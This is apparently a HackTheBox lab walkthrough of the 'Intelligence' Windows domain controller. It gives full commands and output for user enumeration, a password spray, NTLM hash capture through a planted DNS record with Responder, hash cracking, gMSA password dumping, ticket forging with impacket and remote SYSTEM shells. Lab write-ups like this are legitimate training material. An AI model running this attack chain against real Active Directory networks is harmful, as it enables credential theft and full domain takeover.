Intelligence
A medium Windows box from HackTheBox, enumerate users by scraping pdf data off of a web site, and use a password spray attack to get SMB access, through that get another user’s NTLM hash by abusing a custom script and finally abuse ReadGMSAPassword privileges to craft a TGT as administrator and get root.
Recon
Regular nmap
georgy@pop-os:~/Documents/htb/intelligence$ sudo nmap -sC -sV -Pn -oA nmap/init 10.10.10.248
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Intelligence
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-10-06 10:28:27Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-10-06T10:29:48+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-10-06T10:29:47+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-10-06T10:29:48+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-10-06T10:29:47+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-10-06T10:29:11
|_ start_date: N/A
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
Find a few important things
- HTTP on port 80 (add intelligence.htb to the /etc/hosts)
- Its a domain controller (LDAP and RPC)
- Domain name is dc.intelligence.htb
Lets check out the HTTP server
Find an email, contact@intelligence.htb
And also find two pdf files that we can download from the home page, checking them out with exiftool find two likely usernames
georgy@pop-os:~/Documents/htb/intelligence$ exiftool 2020-01-01-upload.pdf
ExifTool Version Number : 12.47
File Name : 2020-01-01-upload.pdf
Directory : .
File Size : 27 kB
File Modification Date/Time : 2021:04:01 13:00:00-04:00
File Access Date/Time : 2022:10:06 01:43:13-04:00
File Inode Change Date/Time : 2022:10:06 01:43:13-04:00
File Permissions : -rw-rw-r--
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
PDF Version : 1.5
Linearized : No
Page Count : 1
Creator : William.Lee
georgy@pop-os:~/Documents/htb/intelligence$ exiftool 2020-12-15-upload.pdf
ExifTool Version Number : 12.47
File Name : 2020-12-15-upload.pdf
Directory : .
File Size : 27 kB
File Modification Date/Time : 2021:04:01 13:00:00-04:00
File Access Date/Time : 2022:10:06 01:44:33-04:00
File Inode Change Date/Time : 2022:10:06 01:44:33-04:00
File Permissions : -rw-rw-r--
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
PDF Version : 1.5
Linearized : No
Page Count : 1
Creator : Jose.Williams
William.Lee and Jose.Williams
There are likely more usernames with more files on the server, but first lets validate the users exist with kerbrute
georgy@pop-os:~/Documents/htb/intelligence$ kerbrute userenum -d intelligence.htb --dc 10.10.10.248 users
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (9cfb81e) - 10/06/22 - Ronnie Flathers @ropnop
2022/10/06 02:02:19 > Using KDC(s):
2022/10/06 02:02:19 > 10.10.10.248:88
2022/10/06 02:02:19 > [+] VALID USERNAME: William.Lee@intelligence.htb
2022/10/06 02:02:19 > [+] VALID USERNAME: Jose.Williams@intelligence.htb
2022/10/06 02:02:19 > Done! Tested 2 usernames (2 valid) in 0.048 seconds
Before we try to password spray, lets see if there are any more pdfs in the /documents folder on the web server
Using this python script
import requests
import datetime
import os
start = datetime.date(2020,1,1)
end = datetime.date(2021,7,30)
while start < end:
url = start.strftime("http://10.10.10.248/Documents/%Y-%m-%d-upload.pdf")
print(url)
r = requests.get(url)
if r.status_code == 200:
print(url)
os.system(f"wget {url}")
start += datetime.timedelta(days=1)
And then using exiftool to loop over the pdfs and get a unique list of users
georgy@pop-os:~/Documents/htb/intelligence$ for file in ./*.pdf; do exiftool $file | grep Creator | cut -f 2 -d ':' | cut -c 2- >> users.txt; done; sort -u -o users.txt users.txt
georgy@pop-os:~/Documents/htb/intelligence$ cat users.txt
Anita.Roberts
Brian.Baker
Brian.Morris
Daniel.Shelton
Danny.Matthews
Darryl.Harris
David.Mcbride
David.Reed
David.Wilson
Ian.Duncan
Jason.Patterson
Jason.Wright
Jennifer.Thomas
Jessica.Moody
John.Coleman
Jose.Williams
Kaitlyn.Zimmerman
Kelly.Long
Nicole.Brock
Richard.Williams
Samuel.Richardson
Scott.Scott
Stephanie.Young
Teresa.Williamson
Thomas.Hall
Thomas.Valenzuela
Tiffany.Molina
Travis.Evans
Veronica.Patel
William.Lee
Doing some more enumeration of these PDF files, find a default password inside
# remove definitely useless files
georgy@pop-os:~/Documents/htb/intelligence$ rm $(pdfgrep lorem -i *.pdf | cut -f 1 -d ':')
# cat the remaining ~10 pdfs and scroll through the output
georgy@pop-os:~/Documents/htb/intelligence$ for f in ./*.pdf ; do pdftotext $f f.txt; cat f.txt; rm f.txt; done;
Inside the cat-ed pdfs find some default creds
New Account Guide
Welcome to Intelligence Corp!
Please login using your username and the default password of:
NewIntelligenceCorpUser9876
After logging in please change your password as soon as possible.
Clearly we need to use some kind of password spray using the default password and the users we collected
Exploitation
To do this password spray, will use crackmapexec, and find a valid password!
georgy@pop-os:~/Documents/htb/intelligence$ cme smb 10.10.10.248 -u users.txt -p NewIntelligenceCorpUser9876
...
SMB 10.10.10.248 445 DC [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876
For the full creds to be Tiffany.Molina:NewIntelligenceCorpUser9876
Now lets see what we can find on the SMB shares as this user
georgy@pop-os:~/Documents/htb/intelligence$ smbclient -L \\\\10.10.10.248 --user=Tiffany.Molina --password=NewIntelligenceCorpUser9876
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
IT Disk
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Users Disk
See the non-standard IT share, look into it, and find a script called “downdetector.ps1”
georgy@pop-os:~/Documents/htb/intelligence$ smbclient \\\\10.10.10.248\\IT --user=Tiffany.Molina --password=NewIntelligenceCorpUser9876
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Apr 18 20:50:55 2021
.. D 0 Sun Apr 18 20:50:55 2021
downdetector.ps1 A 1046 Sun Apr 18 20:50:55 2021
3770367 blocks of size 4096. 1453822 blocks available
smb: \> get downdetector.ps1
getting file \downdetector.ps1 of size 1046 as downdetector.ps1 (6.3 KiloBytes/sec) (average 6.3 KiloBytes/sec)
downdetector.ps1 is a script that runs every 5 mins, and makes a request to all AD DNS records that start with “web”, and if any are down it will email a “Ted Graves”
# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
try {
$request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
if(.StatusCode -ne 200) {
Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
}
} catch {}
}
Can try to capture the NTLM hash by adding our own DNS record beginning with web
georgy@pop-os:/opt/krbrelayx$ python3 dnstool.py -u intelligence.htb\\Tiffany.Molina -p NewIntelligenceCorpUser9876 -a add --type A --data 10.10.14.7 --record web-pwned 10.10.10.248
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
And setup responder and wait, since the script runs every 5 mins
georgy@pop-os:/opt/Responder$ sudo ./Responder.py -I tun0
...
[+] Listening for events...
[HTTP] NTLMv2 Client : 10.10.10.248
[HTTP] NTLMv2 Username : intelligence\Ted.Graves
[HTTP] NTLMv2 Hash : Ted.Graves::intelligence:a21423f19c069a64:36A9650CFED16927094D8F55036A4130:0101000000000000ED46701E90D9D801C014DA2CD540293F00000000020008005A0034005700460001001E00570049004E002D0052004800330048005200490030004E0037004F003300040014005A003400570046002E004C004F00430041004C0003003400570049004E002D0052004800330048005200490030004E0037004F0033002E005A003400570046002E004C004F00430041004C00050014005A003400570046002E004C004F00430041004C000800300030000000000000000000000000200000C1D6194E5BB8EC85FEE91B6025E7AAC8588EFEC739E1D4DBA8337896C6DDB2990A0010000000000000000000000000000000000009003E0048005400540050002F007700650062002D00700077006E00650064002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000
Now lets crack it with hashcat, tp get Ted.Graves:Mr.Teddy
georgy@pop-os:~/Documents/htb/intelligence$ hashcat -m 5600 hash /opt/seclists/Passwords/Leaked-Databases/rockyou.txt
...
TED.GRAVES::intelligence:a21423f19c069a64:36a9650cfed16927094d8f55036a4130:0101000000000000ed46701e90d9d801c014da2cd540293f00000000020008005a0034005700460001001e00570049004e002d0052004800330048005200490030004e0037004f003300040014005a003400570046002e004c004f00430041004c0003003400570049004e002d0052004800330048005200490030004e0037004f0033002e005a003400570046002e004c004f00430041004c00050014005a003400570046002e004c004f00430041004c000800300030000000000000000000000000200000c1d6194e5bb8ec85fee91b6025e7aac8588efec739e1d4dba8337896c6ddb2990a0010000000000000000000000000000000000009003e0048005400540050002f007700650062002d00700077006e00650064002e0069006e00740065006c006c006900670065006e00630065002e006800740062000000000000000000:Mr.Teddy
Now can try and use these creds with python bloodhound, running the collection remotely
georgy@pop-os:~/Documents/htb/intelligence$ /opt/bloodhound-py/./bloodhound.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb -dc intelligence.htb
WARNING: Could not find a global catalog server, assuming the primary DC has this role
If this gives errors, either specify a hostname with -gc or disable gc resolution with --disable-autogc
INFO: Connecting to LDAP server: intelligence.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: intelligence.htb
INFO: Found 43 users
INFO: Found 55 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: svc_int.intelligence.htb
INFO: Querying computer: dc.intelligence.htb
INFO: Skipping enumeration for svc_int.intelligence.htb since it could not be resolved.
INFO: Done in 00M 06S
Then load it into bloodhound, and check the Ted.Graves user, and see that they have derivative control over SVC_INT
So lets see if we can leverage this to get domain admin, lets use a specific tool to abuse this privilege, gMSADumper
georgy@pop-os:/opt/gMSADumper$ sudo python3 gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb -l intelligence.htb
Users or groups who can read password for svc_int$:
> DC$
> itsupport
svc_int$:::4b18bc2b883607c026d27bf526bcb3d4
svc_int$:aes256-cts-hmac-sha1-96:0a56a47fee5f504c5e9eee9292a3ed7dadaeeb2ef9953ab7a5b84437c88b4b3d
svc_int$:aes128-cts-hmac-sha1-96:cc415f2ddee6c3b7180d77106743e514
Now that we have the SVC_INT NTLM hash, can pass-the-hash to create a new ticket to impersonate the administrator using getST.py from impacket
To get the SPN, that’s in the Node Info -> Node Properties section for the svc_int user in Bloodhound
georgy@pop-os:~/Documents/htb/intelligence$ /opt/impacket/examples/./getST.py -dc-ip 10.10.10.248 -hashes :4b18bc2b883607c026d27bf526bcb3d4 -spn www/dc.intelligence.htb -impersonate administrator intelligence.htb/svc_int
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
But the clock skew is off by too much, so going back to the nmap can adjust the clock skew
georgy@pop-os:~/Documents/htb/intelligence$ sudo ntpdate 10.10.10.248
And can use the wmiexec.py script from impacket to get a shell, wmiexec is a script that leverages Windows Management Instrumentation - only able to use this particular script with administrator creds
georgy@pop-os:~/Documents/htb/intelligence$ KRB5CCNAME=administrator.ccache /opt/impacket/examples/./wmiexec.py -k -no-pass administrator@dc.intelligence.htb
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
intelligence\administrator
And get root!
Can also use smbexec.py to do something similar
georgy@pop-os:/opt/impacket/examples$ KRB5CCNAME=~/Documents/htb/intelligence/administrator.ccache /opt/impacket/examples/./smbexec.py -k -no-pass administrator@dc.intelligence.htb
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system
Or psexec.py
georgy@pop-os:/opt/impacket/examples$ KRB5CCNAME=Administrator.ccache python3 psexec.py intelligence.htb/administrator@dc.intelligence.htb -k -no-passImpacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on dc.intelligence.htb.....
[*] Found writable share ADMIN$
[*] Uploading file KKjOfkwp.exe
[*] Opening SVCManager on dc.intelligence.htb.....
[*] Creating service pIMy on dc.intelligence.htb.....
[*] Starting service pIMy.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1879]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system